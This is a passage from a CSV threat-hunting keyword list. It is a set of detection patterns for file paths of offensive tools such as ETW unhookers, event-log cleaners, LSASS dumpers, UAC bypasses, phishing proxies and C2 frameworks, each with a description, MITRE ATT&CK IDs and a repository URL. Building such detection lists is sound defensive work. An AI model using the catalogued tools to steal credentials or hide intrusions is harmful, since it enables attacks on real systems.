Evasion","https://github.com/unkvolism/Fuck-Etw","1","1","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*/ETWHash/*",".{0,1000}\/ETWHash\/.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*/etwunhook.cpp*",".{0,1000}\/etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*/etwunhook.exe*",".{0,1000}\/etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*/etwunhook.git*",".{0,1000}\/etwunhook\.git.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*/evasion/evasion.go",".{0,1000}\/evasion\/evasion\.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/evasion/windows/*",".{0,1000}\/evasion\/windows\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/evasion_linux.go*",".{0,1000}\/evasion_linux\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/evasion_windows.go*",".{0,1000}\/evasion_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/EventCleaner.cpp*",".{0,1000}\/EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*/EventCleaner.exe*",".{0,1000}\/EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*/EventCleaner.git*",".{0,1000}\/EventCleaner\.git.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","1","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*/EventLogCrasher.git*",".{0,1000}\/EventLogCrasher\.git.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","10","10","112","35","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z" "*/EventViewerUAC/*",".{0,1000}\/EventViewerUAC\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of Event Viewer deserialization UAC bypass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/EventViewerUAC_BOF","1","1","N/A","10","10","128","30","2022-05-06T17:43:05Z","2022-05-02T02:08:52Z" "*/EventViewer-UACBypass*",".{0,1000}\/EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*/evil.cpp*",".{0,1000}\/evil\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*/evil.dll*",".{0,1000}\/evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*/evil.ps1*",".{0,1000}\/evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/evil_pdf/*",".{0,1000}\/evil_pdf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/evil_script.py*",".{0,1000}\/evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/EvilClippy*",".{0,1000}\/EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*/EvilClippy-*.zip*",".{0,1000}\/EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*/evilclippy.cs*",".{0,1000}\/evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*/EvilClippy.git*",".{0,1000}\/EvilClippy\.git.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*/evilginx*",".{0,1000}\/evilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","1","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "*/evilginx2.git*",".{0,1000}\/evilginx2\.git.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/evilginx2/*",".{0,1000}\/evilginx2\/.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","1","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*/evilhost:*",".{0,1000}\/evilhost\:.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/EvilLsassTwin*",".{0,1000}\/EvilLsassTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/EvilLsassTwin/*",".{0,1000}\/EvilLsassTwin\/.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/EvilnoVNC.git*",".{0,1000}\/EvilnoVNC\.git.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/EvilnoVNC.git*",".{0,1000}\/EvilnoVNC\.git.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/evil-proxy.git*",".{0,1000}\/evil\-proxy\.git.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*/evil-proxy.rb*",".{0,1000}\/evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","1","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*/evil-proxy/*",".{0,1000}\/evil\-proxy\/.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*/evilqr.git*",".{0,1000}\/evilqr\.git.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","194","33","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" "*/evilrdp.git*",".{0,1000}\/evilrdp\.git.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*/evilrdp/*",".{0,1000}\/evilrdp\/.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*/evilscript.ps1*",".{0,1000}\/evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/evilSignatures.db*",".{0,1000}\/evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*/EvilSln.git*",".{0,1000}\/EvilSln\.git.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*/EvilSln/*.suo*",".{0,1000}\/EvilSln\/.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","1","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*/EvilTwinServer*",".{0,1000}\/EvilTwinServer.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*/EvtMute.git*",".{0,1000}\/EvtMute\.git.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*/Example_C2_Profile*",".{0,1000}\/Example_C2_Profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/Example_Payload_Type/*",".{0,1000}\/Example_Payload_Type\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/ExcelDocWriter.cs*",".{0,1000}\/ExcelDocWriter\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/exchanger.py*",".{0,1000}\/exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe_to_dll.git*",".{0,1000}\/exe_to_dll\.git.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/exe2powershell*",".{0,1000}\/exe2powershell.{0,1000}","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","158","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" "*/exec_bin.c*",".{0,1000}\/exec_bin\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/exec_dll.c*",".{0,1000}\/exec_dll\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/exec_psexec*",".{0,1000}\/exec_psexec.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/exec_psh.c*",".{0,1000}\/exec_psh\.c.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/exec_wmi*",".{0,1000}\/exec_wmi.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - 